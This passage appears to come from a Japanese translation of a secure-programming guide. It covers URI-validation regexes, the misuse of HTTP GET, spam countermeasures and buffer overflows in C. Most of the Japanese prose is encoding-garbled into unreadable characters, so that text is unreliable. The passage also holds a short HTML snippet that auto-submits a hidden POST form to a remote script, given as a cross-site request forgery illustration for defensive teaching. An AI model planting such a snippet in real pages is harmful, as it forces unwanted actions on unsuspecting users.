uhostv͖O(uwww.dwheeler.comv) IPv4 ̐l`̃AhX
(127.0.0.1) wł܂Bu΁vURI ͂IuWFNgú݂v
IuWFNg̑ΈʒuŎQƂȀ̓t@CɂƂĂ悭
Ă܂B

path[?query][#fragment]                                                

Ă URI ł́AĂ镶ɐA̖
߂ 8 rbguURL GR[hv %hh(hh ɂ 8 rbg
16 i̒lœ܂) Ƃ܂B URI ɂāAɏڂ
IETF RFC 2396 ƂɊ֘AKiĂB

܂ URI ̏Ă܂̂ŁAǂ͂ꂼ̕
𒲂ׂĂ݂܂傤B

 E XL[FXL[̑啔͎Ɋ댯łBujavascriptv܂ރXL
    [}ł悤ɂĂ܂ƁAƂT[rXۍU
    邱ƂɂȂĂ܂܂(Ƃ΁AEChE쐬JԂ
    ƂŁA[Ũ}Vt[YāApłȂȂ܂)BƐ[
    Ȃ̂́Ajavascript ̎ɂm̐Ǝ㐫U鋰ꂪ
    _łBXL[ɂ́umailto:v̂悤ɁA[o肪Ȃ
    oĂ܂̂ANCAg}Vŏ\ɈSmۂ
    Ȃ̂܂B܂ÄSȃXL[Ɍ肵āA
    XL[Kv܂B
   
 E ӔCҕF~΁A[Uɂ́uSȁvTCgւ̃N
    ǂł傤B͌IɂƂĂłB
    A[UpX[hA|[gԍɑ΂ĉłȂ΂
    ܂B֎~ׂȂ̂łB[U(Ƃ킯pX[hƂȂ
    )KvƂĂVXe͂炭dvȏK[hĂ
    BNł|Xgł URI ł́AقƂǂ̋@\͕Kvł͂܂
    B܂[UANZXA[UC
    肷̂[UɕĂ炤߂ɁA̋@\𗘗pĂƂ
    ܂B̂悤 URI ł́AZ}eBbNU(semantic
    attack)\ɂȂ܂Bڂ́ASection 6.16 ĉBpX
    [h̃[U͂댯łBuEU͂ĂApX[
    hLbV邩łBʏ́A|[gwׂ͂ł͂܂
    BŔA|[gقȂ΁AvgRقȂ邱Ƃ҂āA
    ʓIɁuvgR̍vōǓ^邩łBƂ΁A
    VXeł́ugophervXL[p\ŁASMTP(dq[) |[
    gw肷邱ƂŁA郆[UɍU҂肽[𑗂点
    ܂BȃP[X(Ƃ http |[g 8008  8080 Ƃ)͔F
    ߂Ă悢܂񂪁AS̓IɌƁA邾̉l͂
    ܂BzXg𖼑OŎw肷ꍇɁAȂ蕶Wɐ
    ܂(DNS ̎dlg)BZpIɌƁAdlł̓A_[XRA(u
    _v)F߂Ă܂񂪁AMicrosoft ͂̎dl̕𖳎Ă邾
    łȂAł̓A_[XRA̎gpKvƂĂ܂B
    Ă炭F߂𓾂ȂP[Xł傤B܂ DNS 
    őT|[gƂɐ͂ł܂Ał͂
    ȏ͘_܂B
   
 E pXFʁApXĖ肠܂񂪁AcOȂpẌꕔ
    NGƂĎgāA󂯂Ă܂AvP[V܂B
    ɂĂ͎Ř_܂B܂ApXɁu..vƓ̏ݒł
    ܂̂ŁAȎĂ Web T[oł́AvCx[gȃf
    [^炵˂܂B́AȑOقǖł͂ȂȂĂ̂
    AWeb T[ołƏCĂBu..vƂ͓
    ʂŁApX(ł΃NG)āAu../vݒłȂ悤ɂĂ
    BA؂dg݂ URL GXP[vĂƁA
    ͓Ȃł傤BŕKvɂȂ̂́A̕GXP
    [vĂo[WAA̕ɑ΂邳܂܂
    usvGR[h܂悤ɂȂ΂ȂȂƂłB
   
 E NGFNG̃tH[}bg(u?vł͂܂)ZLeB̃X
    NɂȂ邩܂BƂ̂ANG̃tH[}bgɂ́A
    ̓NCAgœN̂邩łBĂ͂
    ȂAȂ̃AvP[VlłB̌ɂĂ 
    Section 4.11 ɏڂ񂪂܂BdȖƂāA
    Kv܂BāAWeb TCg̑́Aɂ́u_
    CNg񋟂ꏊvłB_CNgɂ́A[U
    ׂƂłp^擾A[UɐVꏊփ_C
    NgR}h𑗂Ԃ܂BU҂̂悤ȃTCgQl
    āAɊ댯 URI Ƀ_CNgl񋟂A̒lŃuE
    UyɃ_CNgĂ܂ƁA͖ɂȂ܂BJԂ
    ɂȂ܂AuEUɂ͂ƒӂ𕥂ĂBA\
    Ȓӂ[UׂĕĂ킯ł͂܂B܂AWeb Av
    P[Vɂ͐ƎコꍇANGlōU󂯂
    ܂\܂Bĥ͍łB URI 
    Kił́Au+v(vX)F߂Ă܂񂪁Aɂ́u+v
    Xy[X\킷̂ɂ悭gĂ܂B
   
 E tOgFtOg͂hLg̈ꕔłB@
    Ȃ΁AtOgɑ΂U͂ȂƎvĂ܂A
    ̕@̐̂`FbNKv܂BłU҂́A
    dp(")̂悤ȕꂽAr[ URI I点
    ł邩܂(`FbN̗)B
   
 E URL GXP[vF URL GXP[v͕֗łBƂ̂́Aǂ 8 r
    bg\ł邩łBɂƂĂ댯łA
    ͖󂪂܂BɁAURL GXP[v͐䕶\łAo̗
    Ȃ Web AvP[V̑̕\ɑ΂ĖhłB
    ɂ URL GXP[v낤Ȃ낤AWeb AvP[V͂
    ɑ΂Ėhł(obNXbVApTh)B
    ͂ʉ̂łB
   
 E  URIF URI ͂ȂSȂ͂ł(Web TCg܂^c
    Ă)AAvP[VŁA URI Ȃ悢
    ̂܂B
   
APƂ̃g[hIt܂BPȃp^͗₷
̂łAmƂ͌܂(Pł邪䂦ɂ܂ɊÂA܂
ɂ̂ǂ炩łBꂪmȃp^łƂĂ)BGȃp
^͂萳mɂȂ蓾܂AɃG[NA萫\Kv
ƂȂ肷鋰ꂪ܂B܂ɂẮAŝȏ
肦܂B

ł͎̈ĂƂāAuPقƂǈSȁvURI p^Љ܂
B́uƁvŎsłPŁAK\gĂ\łB
Lp^łB

(http|ftp|https)://[-A-Za-z0-9._/]+                                    

̃p^͐ݓIɊ댯ƂȂ\̂悤ȃNGtOgA
|[gA URI F߂A킸ȃXL[Ă܂B
́u%v̎gphƂŁAURL GXP[vAT[o܂
ȂȂł悤ɂȂ܂B܂u:v URL G
XP[vĂȂ̂ŁA|[gw肷̂F߂Ă܂A
댯 URI ւ̃_CNgɂȂ܂(GXP[vĂ
)B܂̗̑̕ph܂BJԂ܂Ao̗ǂ
Ȃ Web AvP[V́u\zÓv܂܂B

́uقƂǈSȁvURI łA^킵 URI 낢ƋĂ
܂B^킵̂Ƃ́ATufBNg(u/v𗘗p)ʃfB
Ngւ̈ړ (u..v𗘗p)݂悤Ȃ̂łB̎̕s
NǴAT[omׂłBsȃzXg ID(Ƃ΁u20.20v)
Ă܂܂AꂪZLeB̎_ƂȂP[X͒m
܂B Web AvP[Vɂ́ATufBNgNG̃f[^
(ƂЂǂ̂ƁAR}h̃f[^)ƂĈ̂܂B
ĥ͈ʓIɍłBƂ̂AueȐ݌v Web AvP[
Vׂāv錩݂͊FłBpX̎gp͉
\łAĂ܂ƃC^[lbg̏قƂǎQƂłȂ
ȂĂ܂܂B܂̃p^ł́A[JȃT[ȍ(uhttp:/
//vuhttp://localhost/vAuhttp://127.0.0.1vg)͎QƉ\
A}V̓lbg[NgăT[oɃANZXĂ܂Bł
T[oAHTTP  GET ߂̌ʂ𓮂߂ł͂ȂAPɏ
擾AƂ߂ƂOɗȂ΂Ȃ܂B 
Section 4.11 ł̓_𐄏Ă܂B̃p^ł̓NG̏F
Ă܂̂ŁAقƂǂ̊ł͂ŏ\Ȃ͂łB

cOȂAuقƂǈSȁvp^A܂ƂŖɗ URI h
ł܂܂BƂ΁AWeb TCg̑́Au?ṽhL
gʂ̂ɎgpĂ܂(Ƃ news TCgł̋L)Bu#v
̓hLg̓̃ZNV肷̂ɖɗ܂A
URI 邱ƂŁAc_ՂȂ܂B܂܂ȋꂽ
 URL GXP[v́uقƂǈSȁvp^ɂ͊܂܂Ă܂BƂ
΁AURL GXP[vȂƁApȊÕy[WɃANZX͍̂
ɂȂ܂B{ɂ̂悤ȋ@\KvȂA@\オقǃ[U
XNƂƂFŁASႢp^gĂ
܂܂B

NG͋邪AvgR|[gɐp^͉L̒ʂ
łB͂uPłSȃp^vƌĂԂƂɂ܂B

 (http|ftp|https)://[-A-Za-z0-9._]+(\/([A-Za-z0-9\-\_\.\!\~\*\'\(\)\%\?]+))*/?

̃p^͐Ă킯ł͂܂BsȃGXP[v╡
NGA ftp ł̃NGF߂Ă邩łBrIPƂ
͎Ă܂B

ɂ́AuSȁvp^̍쐬āAl URI 𐧌
͔̂ɓƂłBł́A󎄂Ăp^łu
̍񂾂Sȃp^vڂĂ݂܂B󔒂͖āARǵu#
vŕ\Ă܂B

 (                                                                              
 (                                                                              
  # Handle http, https, and relative URIs:                                      
  ((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|     
    ([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?                
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path     
   (\?(                                                              # query:   
       (([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=           
        ([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+            
        (\&([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=        
         ([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*)        
       |                                                                        
       (([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+  # isindex 
       )                                                                        
   ))?                                                                          
   (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment 
  )|                                                                            
 # Handle ftp:                                                                  
 (ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)            
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path     
  (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment  
  )                                                                             
 )                                                                              

 

L̎̍񂾃p^łAs URI ׂĂ֎~킯ł͂܂
BƂ΁AJԂɂȂ܂u20.20v͕sȃhCłAp
^ʉ߂Ă܂܂B̒mƂł́AɂăZL
eB̖͔܂B̍񂾃p^͐䕶(Ƃ %00
 %FF ͈̔)\ URL GXP[v֎~Ă܂BĂŏ
̃GXP[vĺA%20(ASCII ̋) łB䕶֎~邱ƂŁAg
u͂h܂A܂BׂẮu2-9vu0-9v
ύX邱ƂŁA䕶Cӂ Web AvP[Vɑ悤ɂȂ
܂B̃p^̓pXɂāAȊOׂĂ URL GXP[v
Ă܂Bۉɂ͕֗łAۉȂVXeł͖
N܂B̃p^͏ȂƂ URI ̒ŁA󔒂sAdp
ȂȂh܂BɂāA URI 쐬ς݂̃hL
gɑgݍ񂾎ɂ̑̎ނ̍Uh܂B̃p^͂
Łu+vĂ_ɒӂĂBŔAvXɂ
󔒕̑ƂāANGtOgŎgĂ邩łB

Lŏqׂ悤ɁAcOȂƂɃNGf[^ƁÃeNjb
NgUA܂NGĂ܂ƁAɖh䂪ق
łȂ悤Ɏv܂BŁAL̃p^NGf[^@
\Ă܂ƂA낤ƎvΉ\łBςāu̍
񂾂Sȃp^v쐬Ă݂܂B

 (                                                                              
 (                                                                              
  # Handle http, https, and relative URIs:                                      
  ((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|     
    ([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?                
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path     
   (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment 
  )|                                                                            
 # Handle ftp:                                                                  
 (ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)            
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path     
  (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment  
  )                                                                             
 )                                                                              

邱Ƃ́Ãp^[UInCp[eLXg̃A
J[ (u<a>v^O)`FbNĂA̕@ŁuWeb ̃oOv
̍h܂B Web oO͒PȃeLXgŁACy[Ŵ匳
Web T[oł͂ȂO҂AÑRecǂ񂾂AƂ
ȏǐՂł悤ɂ܂Bڂ́A Section 7.7 Ă
B悤ȃ`FbN[ <img>(摜)^OɎgĂȂA
͓Ă͂܂܂B摜^O͑Ƀ[hANuWeb oOv
ł܂Bǂ悤łAł͂ǂȑĂȂAƂ
ƂOɂĂ܂B댯ȑ͂ƂĂA񋟂悤
ĂZLeBɌĂ܂܂B

炷ׂẴp^́AURI ̃p^ɊSɃ}b`Ă邱Ƃ
ɂȂĂ邱ƂǂYȂłB̃p^ŕsȂƂ
́AʁAe\ȃp^ɂĂ܂A֗ȃp^̑
ւĂ܂Ƃł(ƂΐV URI XL[̗pW܂)B
܂AWeb TCg̒ɂ 1 ̃NG\킷̂ɁAɑ̃NG
sƂAĥ͌ƂĂƂĂłB
ɂ̂悤 Web TCgɂ́AS̍\ɑgݍ܂Ă܂Ă̂
܂BʂƂāAWeb TCg GET NG 1 ̓Ƃ
󂯎́A URI ͖{ɈSƂ͌܂(Section 4.11 Q)B
 URL  URI ɂĂɏ񂪒m肽΁AIETF RFC 2396 
BhC̏ɂẮAIETF RFC 1034 ŏڂ_Ă
B

 

4.10.5. ̑ HTML ^O

 HTML ^OT|[gɂ͂ǂAƍlĂsvc͂
Bɑł͂͂肵Ă܂B̓Xg`̃^OŁA <ol>
(ordered list) <ul> (unordered list)A<li> (list item)̑Ώۂɂ
܂BƂ܂ŗĂ܂ƁAۂׂĂ̋@\Ă
邱ƂɂȂ܂ (̏ꍇA񋟎҂M邩AŐe
`FbNKv܂)BdvȂ̂́AǉV
@\͂ǂAG[(͍U₷Ƃ)ɂȂƂƂ
_łB

ƂāA悤 URI p^ <img>(摜)^Oꍇ
B邱ƂŁA炩ɈS܂BŔAuWeb oOv
}O҂ɋĂ܂łBWeb oOŁANA̃hL
gǂ񂾂̂ł܂B Web oOڂm肽 Section
7.7 ĂB

 

4.10.6. ֘A

Web AvP[V͕W(ʂ ISO-8859-1)w肵Ȃ΂
BMłȂ[Uf[^̕gĂĂAĂ͂
܂B Section 8.5 ɂɏڂ񂪂܂B

̎̓͂tB^ƁAԈႢN₷̂ŁA̎il
ɘ_Ă܂BI 1 ́Aʂ̌g悤Ƀ[U֊mF
Ƃ̂ŁA HTML ȒPɐ݌vł܂BfUC
HTML PɂȂ܂B܂̌ɑ΂ċ@\ɐ܂
B 1 ̉@́AHTML ͂āAuSȁv`ɕϊA
̈SȌ` HTML ɉ߂@܂B

tB^O͓͎Ao͎A̗͂Ŏ{ł܂B CERT
Ă@́Af[^o͂̉ߒA܂蓮Iȃy[ẄꕔƂ
Ă܂Ƀ_OOł̃tB^łB{ł΁A
ŊmɓIȃRecׂătB^ł܂B CERT ́A
ł̃tB^O͂܂ʂłȂAƍlĂ܂BŔAI
ȃRec HTTP Ƃił͂ȂA Web TCg\f[^x[
ẌꕔɂȂĂ邩łBĂ̏ꍇAWeb T[o͓͏ߒ
ɂẴf[^܂BtB^OAIȃf[^
邠ꏊŎsȂAf[^̒g͉ꂽ܂܂ɂȂ
Ăł傤B

A͂̓_Ɋւ CERT ɓӂ˂܂B͂ƓlAo͂
Ăɑ΂āAtB^YĂ܂_ɖ肪܂B܂
uꂽvf[^̃VXeւ̐NƁAǂŖƂN
̂҂HڂɂȂ܂BSȃvÓAׂ͂ĂtB^
΂܂B̃`FbN̓tB^̈ꕔɓǂ
ꍇ邩ł(΁Aei[Ã[͖{ɂȂ
Ă̂mFł悤ɂȂ܂)BāASKvƂȂvO
ɂ́AvÔŏo͂sӏ̂́Af[^v
Oɓ͂@ꏊ͂ق̐ɂȂĂꍇ܂B
̂悤ȃP[Xł́A͂ŃtB^O@͗Dꂽ@ɂȂ
傤B

 

4.11. NGȊO̎s HTTP  GET ߂g킹Ȃ

HTTP 𗘗p Web x[X̃AvP[Vł́ANGȊO̖ړI
HTTP ́uGETv́uHEADv߂gȂ悤ɂĂB HTTP
ɂ͂܂܂Ȗ߂񂠂܂BłʂɎg閽߂́A GET 
POST  2 łB GET  POST tH[f[^𑗐Mł܂A
GET ߂ URL Ƀf[^đM܂B̈APOST ߂ URL 
͕ʂɃf[^𑗐M܂B

GET NGȊO̖(f[^̕ύX₨̐U荞݁AT[rXɃTC
Abv悤)ɗpƔĂ܂ZLeB̖́AU
҂ӂtH[f[^݂ URL ɑ΂ănCp[eLXg
N𒣂Ƃɂ܂BU҂]҂UāÃNN
bN(nCp[eLXgN̏ꍇ)Ay[W肵
(HTML ̉摜^O摜Ƃď񂪓`Ăꍇ)AGET s
B GET sƁA]҂́AU҂쐬tH[f[^ׂ
̃NւƑ܂B̃TCgɂ܂ӂRec
UɂẮA Section 6.15 Ř_܂B

TCgɂ܂ӂRecɂUAvȂf[^
[UɌ邾ł΁Aقǖ͐[ł͂܂B
͂ŖȂ̂łAɂ̋@\gÛ
̂łBƂ΁A[U\ɉv܂ƂŁAvCoV
[o\łĂ܂BȂƁA@͈@ɂȂ悤
Ȏv悤Ɍ邱ƂŁAɖƂȂA[Uɉ
̕@ŏvāA{͌JȂU҂֌J
肷邩܂BƉe[Ȃ̂́AӂU҂
f[^邾łȂATCg܂NɂāAf[^
₂sׂłB

ʓI HTTP ̃C^tF[X(Ă CGI Cu)́AGET  POST
̈Ⴂ킩ȂĂ܂̂ŁAf[^擾Ƃ_炷Ƒo̖
߂u̕@vƂĈ֗łBAf[^NGȊỎ
̏ۂɍsȂAv POST ȊOɉ̂ă`FbN
Kv܂BȂA^ꂽf[^tH[ɓĂ
\A[U{ɂ̗vȂ̂AmFĂB
邱ƂŁATCg܂ӂRecɑ΂Uh
܂B[Uɂ́AȒPɃNbNŊmFł悤ɂȂ
Ȃ܂B

ہAHTTP ̎dlł͂̍sׂĂ܂B HTTP 1.1 ̎dl
(IETF RFC 2616 ZNV 9.1.1)ɂƁAuGET  HEAD ߂ȊO
œuӖ͂Ȃ͂vłB̖߂́uSvł͂łB
̓[UG[WFgɑ΂āAʂȕ@ł̖̑߂ł POST
 PUTA DELETE ̑܂B̌ʁASłȂȂ
vĂAƂ[UmƂƂȂ܂vB

܂Ał͖Sɂ͉łȂ_ɒӂĂ
BȂȂAuEU(̐ݒ̒)ɂ̓XNvgꂽ POST œ
ȓ삪ł̂邩łBƂ΁AECMAscript(Javascript)
\ Web uEUL HTML ̒fЂ󂯎Ɖ肵܂B
uEÚA HTML ̒fЂ\邾ŁAU҂`tH[
f[^IɃ[UōU҂I Web TCgɑ΂ POST
߂𑗂Ă܂܂B

  <form action=http://remote/script.cgi method=post name=b>            
    <input type=hidden name=action value="do something">               
    <input type=submit>                                                
  </form>                                                              
  <script>document.b.submit()</script>                                 

̓_wEĂꂽ David deVitry ɂ͊ӂĂ܂B̃A
hoCXł肷ׂĂ͉ł܂B邾̉l͂܂
Bc̖͂xA茫uEU(Ƃ΁AECMAscript 
Web tH[𑗂Oɂ͏ɂ̃f[^mF) Web uEU̐ݒ
(Ƃ΁A ECMAscript 𖳌ɂ)ŉł܂B܂A̍U̓N
XTCgEXNveBOȖł͋@\܂BŔAWeb T
Cg̑́A[UuscriptvR}h POST łȂ悤ɂĂ
AURL NRɒ悤ɂĂ邩łB܂AGET R}
h̓𐧌ƁANGɑ΂ Web AvP[ṼZLe
BP܂B

 

4.12. SPAM ɑ΍R

ǂɓdq[𑗂vOȂAlbg[N̗v SPAM
̉^щɂȂ܂B SPAM Ƃt͒ʏ̂ŁAɂ unsolicited bulk
email(UBE)́Amass unsolicited email ƌ܂B unsolicited
commercial email(UCE)Ƃ܂A͌𐶂݂܂BSPAM ׂ
pł͂ȂłB SPAM Ȃ[ȖƂȂĂ̂́A
QƂĂB http://mail-abuse.org/, http://spam.abuse.net/, 
CAUCE <http://http://www.cauce.org/>, and IETF RFC 2635 <http://
www.faqs.org/rfcs/rfc2635.html> SPAM 󂯎蒆p肷lA
SPAM ɂRXg̑啔𕉒SĂāASPAM 𑗂l͑̂ɂق
ǃRXgĂ܂BāASPAM T[rXD_Ƃ݂Ȃ
l唼ŁAhȍsׂƂ͎vĂ܂B

vOɑdq[쐬悤Ȃ(MTA dq[Ńf[
^𑗂́A[OXgǗ)AvO΂ɕsȓd
q[̒pȂ悤ɍ쐬ĂBvO͕ʁAK
F߂ꂽ[U҂ɓdq[𑗂悤ɂĂ(Ƃ
΁AƂ̃[T[o֓o^AɃT[rXɉ)B
ڂ́A IETF RFC 2505 <http://www.faqs.org/rfcs/rfc2505.html> 
܂B܂A[OXg^pĂȂAo^҂e
\Ƃ[K{ĂB܂uOCv@\t邱
ƂŁASPAM 𑗂lAo^ESPAMoEEނ̂ɁAȂ
܂B

SPAM ɑ΂蒼ړIȑ΍R 1 ɁAMAPS (Mail Abuse Prevention
System LLC) RBL (Realtime Blackhole List)ɉ@܂B
́ASPAM ̏oƂĒmĂ IP AhẌꗗ𐏎XVĂ
Bɏڂ http://mail-abuse.org/rbl/ ĂBŋ
 Mail Transfer Agent(MTA)̑́A RBL T|[gĂ܂B
̂悤ɐݒ肷邩́Aꂼ Web TCgĂBʏ RBL 
pƁAubNz[EXgɍڂĂ IP AhX̂
vPɋۂ܂B͌łA܂B
ɂlȋ@\񋟂T[rXƎv܂B

VXevOœdq[𑼂̏ɔzłȂ̋ʂ
胆[ŮǗɂꍇAVXevȎł̓ftHg
SPAM ̃ubNLɂ悤E߂܂B MTA ΏۂɂȂ܂B
͂ƂꌟĂB񂱂̒ẮAIɂ͖肪
B͐K̃[UƂ̂肪(܂)ւ邩Ȃ_
BASPAM ubNȂ΁AׂĂ̐lȂ̃VXeu
bNXgɍڂ鋰ꂪ܂(܂肠Ȃ̓dq[͖
)B̖͒Pł͂܂BȂ悤ƂAdq[
󂯎ȂloĂ邩łB RBL ǗĂgDǂ
M邩AƂ܂BƂ΁A{͌ȃTCgu
bNXgɒǉꂽƂ܂BčƂƂŁȂgD
Xg폜܂BȂ͂ OK ł傤B܂Ag
[hItȂ̂łB؂Ȃ̂́ASPAM 𑗂Ăl(Ȑl炩
܂) SPAM ubNĂ鑼̃VXe(SPAM 𑗂ĂlƓ
gĂ閳ȐlrĂ܂)Ƌ邱Ƃł͂Ȃł傤
B_ɑΉȂ΂Ȃ͎̂łBc_̗]n̂ĂȂ̂
AF񂪒uĂ闧lĂ݂ĂB

 

4.13. ͎Ԃƕ׃xɐ

^CAEg݂A׃xɐĂBlbg[N
Ăf[^ɂ͓ɂłBȂƁAU҂͌păT[
rXvāAT[rXۍUȒPɎsłĂ܂܂
B

 

Chapter 5. obt@I[o[t[̉

                                    G̒n͂݁AO̍Ԃ|A 
                                    s𗪒DB                   
                                                                       
                                            񐹏AX 3  11 

pɂɔĂZLeB̎_́Auobt@I[o[t[v
΂Ǝ㐫łBobt@I[o[t[́uobt@I[o[vƂ
A܂܂ȃobt@I[o[t[U݂Ă܂(uX^bN
̈jvuq[v̈jvł)BɌ΁Aobt@I[o
[t[̓vO̖̎łA܂ɕpɂɔAd
ȖĂ̂ŁAēƗčڂ𗧂Ă܂B̖肪
ɏdvȂ̂́ACERT ̊̓ 1998 N 13 ̓ 9A1999 N̏
Ƃȏオobt@I[o[t[֘Ał邱ƂŖ炩łB
Bugtraq ɂ 1999 N̔ȒłA悻 2/3 ̉񓚂obt@
I[o[t[ZLeB̐Ǝコ̌ƂĂ܂(c̉񓚂́u
~XvƂĂ܂) [Cowan 1999]B͈ȑO炠m̖
łAɊxƂȂł [McGraw 2000]By󒐁FBugtraq
́AZLeB֘Ȁ肷 ML łB ML ̃A[JCu
<http://www.securityfocus.com/archive/1> JĂ܂B{ł
ML ݂Ă܂Bڂ́A BUGTRAQ-JP FAQ <http://
www.securityfocus.com/popups/forums/bugtraq-jp/faq.shtml#0.1.1> 
z

obt@I[o[t[́Al()Œ蒷̃obt@̈ɂ
̈zďĂ܂ꍇɔ܂Bobt@I[o[t[
A[U̓͂obt@ɓǂݍގɂN܂AvO
܂̍ŒɂN\܂B

S߂vOŃobt@I[o[t[NƁAU
pP[X悭܂Bobt@ C ̃[JϐŎ
ĂꍇAU҂͂̃I[o[t[̊֐Ŗ]݂̃R[h
IɎsiƂėp܂B̍ŨoG[V́uX
^bNj(stack smashing)vUƌĂԏꍇ܂܂܂Bobt@q
[v̈ɂĂA󋵂ǂȂ킯ł͂܂BU҂́AI[o
[t[gāAvO̕ϐRg[ł܂Bɏڍ
ȏ́AAleph1 [1996] Mudge [1995]ALSD [2001]Qlɂ邩A
Nathan P. Smith ̃TCg http://destroy.net/machines/security/ ɂ
uStack Smashing Security VulnerabilitiesvĂBy󒐁Fq[
v̈́AvOŗpf[^i[̈ŁApɓIɊ
蓖ĂApςނƉꂽAėpɉ񂳂܂B C ł
malloc(3) Ŋmۂꂽ̈悪ɓ܂z

̑啔́Aɉe܂BŔA
Iɔz̑傫ύX(Ƃ Perl)Aobt@I[o[t[
mĖh䂷悤ɂȂĂ(Ƃ΁AAda95)邩łB
AC ͂̂悤Ȗɑ΂āAhi킹Ă܂񂵁A
C++ ł̖𔭐̂͑܂BAZuł
h䂷@܂Bɂ͂̂悤ȖhĂ(
΁AAda  Pascal)܂Aʏ͖ɂȂĂ܂(\̗R
ł)BƂvȎ啔𑼂̌ŏĂĂACu[
`̑Ƃ̃Cu[`ĂяoC^tF[XR[h C 
C++ ŏĂ܂BāǍꂪҒʂɃobt@I[o[
t[SɖhƂ͌܂B

 

5.1. C  C++ ̊댯ȂƂ

C [ÚAmۂĂ̈z邱Ƃ͂肦ȂƊm؂łȂ
΁AE`FbNȂ댯Ȋ֐gׂł͂܂Bʏgp
ǂ(mɖh䂷ׂ)֐ɂ́Astrcpy(3) strcat(3)A
sprintf(3)(eʂɓ vsprintf(3))Agets(3) ܂B̑
āAstrncpy(3)Astrncat(3)Asnprintf(3) fgets(3)̎gpE߂
܂Bڂ͉LŘ_܂̂œǂłB strlen(3) NIL K
݂̂młȂ΁AgpĂB scanf()n (scanf(3)
 fscanf(3)Asscanf(3)Avscanf(3)Avsscanf(3)Avfscanf(3)) ́Agp
̂Ɋ댯ȏꍇX܂BŒlcɃf[^𕶎ɓn
Ȃł(Ƃ킯 %s Ƃ`͖ɂȂ܂)Bobt@I[o
[Ă܂Ȃ̊댯Ȋ֐Ƃ(̎gɂ܂
)Arealpath(3) getopt(3)Agetpass(3)Astreadd(3)Astrecpy(3)A
strtrns(3)܂B getwd(3)ɂ͒ӂȂƂ܂Bgetwd(3)ɑ
obt@́A PATH_MAX oCg܂B

snprintf()n͎cOȂƖĂ܂B sprintf() ƈ
snprintf()́Aɂ ISO 1990(ANSI 1989)Ki̕W C ֐ł͂܂
BāAVXeׂĂ snprintf() 킯ł͂܂B
ɍƂɁAVXe snprintf()́Aobt@I[o[t[
h܂B sprintf ĂяołB Linux  libc4 Ƃ
Âo[ẂAulibbsdvCuɈˑĂ܂Bꂪ
炵CułBÂ HP ̃VXeɂlȂ̂܂
B Linux ̍ŋ߂ snprintf ͐삷邱Ƃ킩ĂāAv
ElɎĂ܂B snprintf() ̕Ԃl܂܂łB
Single Unix Specification (SUS) version 2  C99 Kił́AԂ邩
Ă܂BʓIɂ킩̂́Asnprintf ̃o[Wɂ͕ NIL
ŏI[̂ۏ؂Ȃ̂AƂłB񂪒
ANIL ܂Ȃł傤B glib Cu(GTK ̃x[XɂȂĂ
̂ŁAGNU C Cu glib Ƃ͈Ⴂ܂)ɂ g_snprintf() 
BԂlтĂA NIL ŏI[܂BƏdvȂ̂́Aob
t@̒ɎĂ_łBy󒐁FC99 KíAuISO/IEC 9899:
1999 - Programming Language Cvw܂Bڂ http://
seclan.dll.jp/c99d/ QƂĂz

 

5.2. C  C++ ł̃Cuɂ

C/C++ ɂƂāAobt@I[o[t[̖ĂȂ
֐Cu̗p܂B͂߂̃TuZNVł́AuW C 
Cuvg@܂Bʂ͂܂A_
B̃TuZNVł́Aobt@I[o[t[ɑ΂āAŒ蒷Ɠ
IɍĊmۂ闼@ŃZLeB悭܂B
TuZNVł́Astrlcpy  libmib ƂȂ܂܂ȃCu
ɂĐ܂B

 

5.2.1. W C Cuɂ

C Ńobt@I[o[t[hu퓅vi(C++ łgĂ܂)
Aobt@I[o[t[hłW C CuĂяoƂł
B̉@́AW֐ł strncpy(3) strncat(3)łǂɂ
Ȃ܂B̉Ƃɂ͒ӂKvłBgӊOƖʓ|ŁA
̂łB strncpy(3)̓Rs[̕񂪃Rs[
̒ȂARs[̏̕I[ NIL Zbg܂B
Astrncpy(3)ďoɁARs[̏I[ NIL KZbg悤
ĂBobt@g񂵂ȂAstrncpy()g
Aobt@ɂ͎ەKvȂ̂ 1 ēnAgOɍŌ̕
ɂ NIL ZbgĂB͌ʂ܂B strncpy
(3)Astrncat(3)ƂA݂ł̈̎c̑傫œnKv
܂A̎cʂ̌vZ悭ԈႢ܂(ŊԈĂ܂ƁAob
t@I[o[t[UĂ܂܂)Bǂ̊֐dgݏAob
t@I[o[t[ǂȒPɊmFł܂BʂƂ
Aւ֐ł strncpy(3) strcpy(3)ɔׂāAptH[}X
܂B strncpy(3)Rs[̎c̈ NIL Ŗ߂邽߂łB
